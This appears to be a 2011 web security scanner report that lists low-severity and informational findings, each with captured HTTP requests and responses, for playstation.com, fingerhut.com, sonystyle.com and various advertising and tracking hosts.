HTTP/1.1 302 Found Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: sessionstamp=1186043 Cache-Control: private Location: http://r.turn.com/r Server: Jetty(6.1.22) Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a) Connection: keep-alive Content-Length: 0 |
Severity: | Low |
Confidence: | Firm |
Host: | http://us.playstation.com |
Path: | /uwps/TickerMessages |
GET /uwps/TickerMessages?type Host: us.playstation.com Proxy-Connection: keep-alive Referer: http://us.playstation.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=112sNQ3Q2 |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 20:30:04 GMT Server: Apache ntCoent-Length: 935 Set-Cookie: JSESSIONID=QTn5NQ3Mc X-Powered-By: Servlet/2.5 JSP/2.1 Content-Type: text/xml; charset=UTF-8 Cache-Control: private Content-Length: 935 <messages> <message type="p1"> <text><a onclick="javascript ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://www.fingerhut.com |
Path: | / |
GET / HTTP/1.1 Host: www.fingerhut.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PIPELINE_SESSION_ID |
HTTP/1.1 200 OK Server: Apache Content-Type: text/html;charset=ISO Vary: Accept-Encoding Content-Length: 119735 Date: Mon, 16 May 2011 01:37:34 GMT Connection: close Set-Cookie: JSESSIONID=ACAC16584 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html > <head> <style type="text/css"> body { ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://www.fingerhut.com |
Path: | /fingerhut/css/sifr |
GET /fingerhut/css/sifr Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.fingerhut.com |
HTTP/1.1 200 OK Server: Apache Content-Type: text/html;charset=ISO Vary: Accept-Encoding Content-Length: 2618 Date: Mon, 16 May 2011 01:27:58 GMT Connection: close Set-Cookie: PIPELINE_SESSION_ID Set-Cookie: JSESSIONID=6AA961A6D var bellgothicbold = { src: '/fingerhut/fonts var bellgothic = { src: '/fingerhut/fonts //sIFR.useStyleCheck = true; sIFR.fromLocal = true; // Nex ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://www.fingerhut.com |
Path: | /includes/financial |
GET /includes/financial Host: www.fingerhut.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com/ X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PIPELINE_SESSION_ID |
HTTP/1.1 200 OK Server: Apache Content-Language: en Content-Type: text/html;charset=ISO Vary: Accept-Encoding Content-Length: 2175 Date: Mon, 16 May 2011 01:38:46 GMT Connection: close Set-Cookie: JSESSIONID=A5E2904F1 <!--<div id="exampleLink">Scroll< <div id="financialSnapsho <div id="ccConatainer"> <script type="text/javascript"> site.func.updateHeader(0) </script> <div id="fsC ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://www.fingerhut.com |
Path: | /js/config_dhtml.jsp |
GET /js/config_dhtml.jsp HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.fingerhut.com |
HTTP/1.1 200 OK Server: Apache Cache-Control: max-age=1800, must-revalidate Last-Modified: Mon, 16 May 2011 01:27:58 GMT Content-Length: 684 Content-Type: text/javascript;charset Vary: Accept-Encoding Date: Mon, 16 May 2011 01:27:58 GMT Connection: close Set-Cookie: PIPELINE_SESSION_ID Set-Cookie: JSESSIONID=BAAF0C846 // Function: S7ConfigObject() // Purpose: Constructor for the S7ConfigObject class // Param: None // Output: A new instantiated S7ConfigObject instance // Notes: No need to use this function expli ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://www.fingerhut.com |
Path: | /js/financial-snapshot |
GET /js/financial-snapshot Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.fingerhut.com |
HTTP/1.1 200 OK Server: Apache Content-Language: en Cache-Control: max-age=3600 Expires: Mon, 16 May 2011 02:28:06 GMT Content-Type: text/html;charset=ISO Vary: Accept-Encoding Content-Length: 5659 Date: Mon, 16 May 2011 01:28:06 GMT Connection: close Set-Cookie: PIPELINE_SESSION_ID Set-Cookie: JSESSIONID=9B017D052 var financialSnapshot = function() { $(function() { financialSnapshot.init(); }); var _p = { rColIndex : null, loadAsset : function() { if ( $( "#financialSnapshot" ).le ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://www.fingerhut.com |
Path: | /js/persistent_cart.jsp |
GET /js/persistent_cart.jsp HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.fingerhut.com |
HTTP/1.1 200 OK Server: Apache Cache-Control: max-age=3600 Expires: Mon, 16 May 2011 02:28:00 GMT Content-Type: text/html;charset=ISO Vary: Accept-Encoding Content-Length: 11446 Date: Mon, 16 May 2011 01:28:01 GMT Connection: close Set-Cookie: PIPELINE_SESSION_ID Set-Cookie: JSESSIONID=219E43F5F var persistentCartCommands = new Array(8); persistentCartCommands[0] = '/checkout/universal_cart persistentCartCommands[1] = '/checkout/add_item_pc persistentCartCommands[2] = '/che ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://www.fingerhut.com |
Path: | /js/s_code.jsp |
GET /js/s_code.jsp HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.fingerhut.com |
HTTP/1.1 200 OK Server: Apache Cache-Control: max-age=1800, must-revalidate Last-Modified: Mon, 16 May 2011 01:27:58 GMT Content-Type: text/javascript;charset Vary: Accept-Encoding Content-Length: 41956 Date: Mon, 16 May 2011 01:27:58 GMT Connection: close Set-Cookie: PIPELINE_SESSION_ID Set-Cookie: JSESSIONID=5EE53F39A /* SiteCatalyst code version: H.21. Copyright 1996-2010 Adobe, Inc. All Rights Reserved More info available at http://www.omniture.com */ /************************ ADDITIONAL FEATURES *********** ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://www.fingerhut.com |
Path: | /js/scene7/scene7.jsp |
GET /js/scene7/scene7.jsp HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.fingerhut.com |
HTTP/1.1 200 OK Server: Apache Cache-Control: max-age=1800, must-revalidate Last-Modified: Mon, 16 May 2011 01:28:04 GMT Content-Type: text/javascript;charset Vary: Accept-Encoding Content-Length: 2614 Date: Mon, 16 May 2011 01:28:04 GMT Connection: close Set-Cookie: PIPELINE_SESSION_ID Set-Cookie: JSESSIONID=F1D28BDF5 (function() { var sj_codebase = window.sj_codebase = "http://s7isorigin3 if ( window.location.protocol == "https:" ) { sj_codebase = "https://a248.e.akamai ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://www.fingerhut.com |
Path: | /js/sifr.jsp |
GET /js/sifr.jsp HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.fingerhut.com |
HTTP/1.1 200 OK Server: Apache Cache-Control: max-age=3600 Expires: Mon, 16 May 2011 02:27:57 GMT Content-Type: text/html;charset=ISO Vary: Accept-Encoding Content-Length: 29365 Date: Mon, 16 May 2011 01:27:57 GMT Connection: close Set-Cookie: PIPELINE_SESSION_ID Set-Cookie: JSESSIONID=14E32CA86 /************************ scalable Inman Flash Replacement (sIFR) version 3, revision 436. Copyright 2006 ... 2008 Mark Wubben, <http://nov ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | https://www.fingerhut.com |
Path: | /fingerhut/css/sifr |
GET /fingerhut/css/sifr Host: www.fingerhut.com Connection: keep-alive Referer: https://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PIPELINE_SESSION_ID |
HTTP/1.1 200 OK Server: Apache Content-Type: text/html;charset=ISO Vary: Accept-Encoding Content-Length: 2618 Date: Mon, 16 May 2011 01:31:23 GMT Connection: keep-alive Set-Cookie: JSESSIONID=B2A6DA49F var bellgothicbold = { src: '/fingerhut/fonts var bellgothic = { src: '/fingerhut/fonts //sIFR.useStyleCheck = true; sIFR.fromLocal = true; // Nex ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | https://www.fingerhut.com |
Path: | /js/persistent_cart.jsp |
GET /js/persistent_cart.jsp HTTP/1.1 Host: www.fingerhut.com Connection: keep-alive Referer: https://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PIPELINE_SESSION_ID |
HTTP/1.1 200 OK Server: Apache Cache-Control: max-age=3600 Expires: Mon, 16 May 2011 02:31:16 GMT Content-Type: text/html;charset=ISO Vary: Accept-Encoding Content-Length: 11446 Date: Mon, 16 May 2011 01:31:16 GMT Connection: keep-alive Set-Cookie: JSESSIONID=3BBDC68C4 var persistentCartCommands = new Array(8); persistentCartCommands[0] = '/checkout/universal_cart persistentCartCommands[1] = '/checkout/add_item_pc persistentCartCommands[2] = '/che ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | https://www.fingerhut.com |
Path: | /js/s_code.jsp |
GET /js/s_code.jsp HTTP/1.1 Host: www.fingerhut.com Connection: keep-alive Referer: https://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PIPELINE_SESSION_ID |
HTTP/1.1 200 OK Server: Apache Cache-Control: max-age=1800, must-revalidate Last-Modified: Mon, 16 May 2011 01:31:10 GMT Content-Type: text/javascript;charset Vary: Accept-Encoding Content-Length: 41956 Date: Mon, 16 May 2011 01:31:10 GMT Connection: keep-alive Set-Cookie: JSESSIONID=E4F591BB7 /* SiteCatalyst code version: H.21. Copyright 1996-2010 Adobe, Inc. All Rights Reserved More info available at http://www.omniture.com */ /************************ ADDITIONAL FEATURES *********** ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | https://www.fingerhut.com |
Path: | /js/sifr.jsp |
GET /js/sifr.jsp HTTP/1.1 Host: www.fingerhut.com Connection: keep-alive Referer: https://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PIPELINE_SESSION_ID |
HTTP/1.1 200 OK Server: Apache Cache-Control: max-age=3600 Expires: Mon, 16 May 2011 02:31:23 GMT Content-Type: text/html;charset=ISO Vary: Accept-Encoding Content-Length: 29365 Date: Mon, 16 May 2011 01:31:23 GMT Connection: keep-alive Set-Cookie: JSESSIONID=3D026D7D1 /************************ scalable Inman Flash Replacement (sIFR) version 3, revision 436. Copyright 2006 ... 2008 Mark Wubben, <http://nov ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | https://www.fingerhut.com |
Path: | /user/login.jsp |
GET /user/login.jsp HTTP/1.1 Host: www.fingerhut.com Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PIPELINE_SESSION_ID |
HTTP/1.1 200 OK Server: Apache Content-Type: text/html;charset=ISO Vary: Accept-Encoding Content-Length: 83965 Date: Mon, 16 May 2011 01:37:28 GMT Connection: keep-alive Set-Cookie: JSESSIONID=B5C80FAB7 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html > <head> <style type="text/css"> body { ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://www.sonystyle.com |
Path: | /webapp/wcs/stores |
GET /webapp/wcs/stores User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.sonystyle.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive |
HTTP/1.1 200 OK ntCoent-Length: 4641 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 4641 Vary: Accept-Encoding Date: Sun, 15 May 2011 21:20:44 GMT Connection: close Set-Cookie: JSESSIONID=0000hwdv8 Set-Cookie: WC_PERSISTENT=n0FjwS Set-Cookie: TS5bbf46=3db1ba839d4 Cache-Control: private Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta id="meta_refresh" ht ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://www.viddler.com |
Path: | /thumbnail/7d63c65a/ |
GET /thumbnail/7d63c65a/ HTTP/1.1 Host: www.viddler.com Proxy-Connection: keep-alive Referer: http://blog.us.plays User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 302 Moved Temporarily Server: nginx/0.6.32 Date: Sun, 15 May 2011 20:26:39 GMT Content-Type: text/plain Connection: keep-alive X-Viddler-Node: viddler_d Set-Cookie: JSESSIONID=8D6233A47 Location: http://cdn-thumbs.viddler Content-Length: 0 |
Severity: | Information |
Confidence: | Certain |
Host: | http://a.tribalfusion.com |
Path: | /j.ad |
GET /j.ad?site=pastebincom Host: a.tribalfusion.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://pastebin.com Cookie: ANON_ID=a5nu7qsjyDsA |
HTTP/1.1 200 OK P3P: CP="NOI DEVo TAIa OUR BUS" X-Function: 101 X-Reuse-Index: 1 Pragma: no-cache Cache-Control: private, no-cache, no-store, proxy-revalidate Set-Cookie: ANON_ID=amnufry4Zaw4 Content-Type: application/x-javascript Vary: Accept-Encoding Content-Length: 2150 Expires: 0 Connection: keep-alive document.write('<script language=\'javascript\'> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://action.media6 |
Path: | /orbserv/hbpix |
GET /orbserv/hbpix?pixId=1628 HTTP/1.1 Host: action.media6degrees.com Proxy-Connection: keep-alive Referer: http://www.armaniexchange User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=BDC5BFE2B |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="COM NAV INT STA NID OUR IND NOI" Pragma: no-cache Cache-Control: no-cache Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: clid=2ll77mm01171voo Set-Cookie: orblb=2ll8nk2031zw10 Set-Cookie: rdrlst=4090spbll9m03 Set-Cookie: sglst=2050s90ill9m03 Set-Cookie: vstcnt=418b010r01496 Content-Type: image/gif Content-Length: 43 Date: Mon, 16 May 2011 01:43:17 GMT GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ad.turn.com |
Path: | /server/ads.js |
GET /server/ads.js?pub Host: ad.turn.com Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: pf=UzQBb_qiX6nr0FKOS |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: public Cache-Control: max-age=172800 Cache-Control: must-revalidate Expires: Wed, 18 May 2011 01:40:38 GMT Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:40:38 GMT; Path=/ Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: adImpCount=z8H5DIFkJ Set-Cookie: fc=VBzn51JQz0zltCfNS Set-Cookie: pf=_ueUnCc1-Qecqj3JV Content-Type: text/javascript;charset Vary: Accept-Encoding Date: Mon, 16 May 2011 01:40:38 GMT Content-Length: 11133 var detect = navigator.userAgent function checkIt(string) { return detect.indexOf(string) >= 0; } var naturalImages = new Array; naturalImageOnLoad = function() { if (this.width ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ad.turn.com |
Path: | /server/pixel.htm |
GET /server/pixel.htm?fpid=1 Host: ad.turn.com Proxy-Connection: keep-alive Referer: http://ads.pubmatic.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uid=4325897289836481830; pf=UzQBb_qiX6nr0FKOS |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:19:50 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Mon, 16 May 2011 01:19:49 GMT Content-Length: 335 <html> <head> </head> <body> <iframe name="turn_sync_frame" width="0" height="0" frameborder="0" src="http://cdn.turn.com ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ad.yieldmanager |
Path: | /imp |
GET /imp?Z=728x90&s=1565884& Host: ad.yieldmanager.com Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uid=uid=c0ff5dec-7e12 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:25:17 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" X-RightMedia-Hostname: raptor0017.rm.bf1 Set-Cookie: BX=edn6q5d6t078b&b=4&s=k0 Cache-Control: no-store Last-Modified: Mon, 16 May 2011 01:25:17 GMT Pragma: no-cache Content-Length: 864 Content-Type: application/x-javascript Age: 0 Proxy-Connection: close document.write('<iframe allowtransparency=\"true\ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ad.yieldmanager |
Path: | /pixel |
GET /pixel?id=744660&id Host: ad.yieldmanager.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://pastebin.com Cookie: BX=ek8k2sl67ofpa&b=4&s=o9 |
HTTP/1.1 302 Found Date: Sun, 15 May 2011 21:31:01 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: bh="b!!!!a!!Zwa!!!!#=!DU4 Set-Cookie: BX=ek8k2sl67ofpa&b=4&s=o9 Location: http://www.googleads Cache-Control: no-store Last-Modified: Sun, 15 May 2011 21:31:01 GMT Pragma: no-cache Content-Length: 0 Age: 0 Proxy-Connection: close |
Severity: | Information |
Confidence: | Certain |
Host: | http://ads.revsci.net |
Path: | /adserver/ako |
GET /adserver/ako?activate Host: ads.revsci.net Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NETID01=f6600bc0a975 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://js Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver Set-Cookie: rsiPus_IH_7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver Set-Cookie: rsiPus_vQ_l=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver Set-Cookie: rsiPus_BLx4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rsiPus_IH_7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rsiPus_vQ_l=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rsiPus_BLx4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rsiPus_c7op="MLuBMx5 Set-Cookie: rsi_us_1000000="pUMd5U Content-Type: application/x-javascript Vary: Accept-Encoding Date: Mon, 16 May 2011 01:26:11 GMT Content-Length: 778 function rsi_img(p,u,c){if(u i.src=u;p[p.length]=i;}} function rsi_simg(p,s,i){if(i<s ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://adserver.veruta |
Path: | /track.fcgi |
GET /track.fcgi?merchantid Host: adserver.veruta.com Proxy-Connection: keep-alive Referer: http://t.p.mybuys.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ueid=1461734246 |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 16 May 2011 01:43:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding Cache-Control: max-age=0, no-store, must-revalidate, no-cache Expires: Thu, 01-Jan-1970 00:00:00 GMT P3P: policyref="http://www Pragma: no-cache Set-cookie: ueid=1461734246 Set-cookie: cmid=20772879917; expires=Tue, 15-May-2012 01:43:23 GMT; path=/; domain=.veruta.com; Content-Length: 65 <html><head><title>< |
Severity: | Information |
Confidence: | Certain |
Host: | http://ak1.abmr.net |
Path: | /is/images3.pacsun.com |
GET /is/images3.pacsun.com?U= Host: ak1.abmr.net Proxy-Connection: keep-alive Referer: http://shop.pacsun.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: 01AI=2-2-9FDE8D6FF0B |
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://images3.pacsun.com Expires: Mon, 16 May 2011 01:43:57 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:43:57 GMT Connection: close Set-Cookie: 01AI=2-2-0668EB3294B P3P: policyref="http://www |
Severity: | Information |
Confidence: | Certain |
Host: | http://ak1.abmr.net |
Path: | /is/tag.admeld.com |
GET /is/tag.admeld.com?U=/ad Host: ak1.abmr.net Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: 01AI=2-2-3389AF6B211 |
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://tag.admeld.com/ad Expires: Mon, 16 May 2011 01:19:52 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:19:52 GMT Connection: close Set-Cookie: 01AI=2-2-0F97FF17A6C P3P: policyref="http://www |
Severity: | Information |
Confidence: | Certain |
Host: | http://ak1.abmr.net |
Path: | /is/tag.contextweb.com |
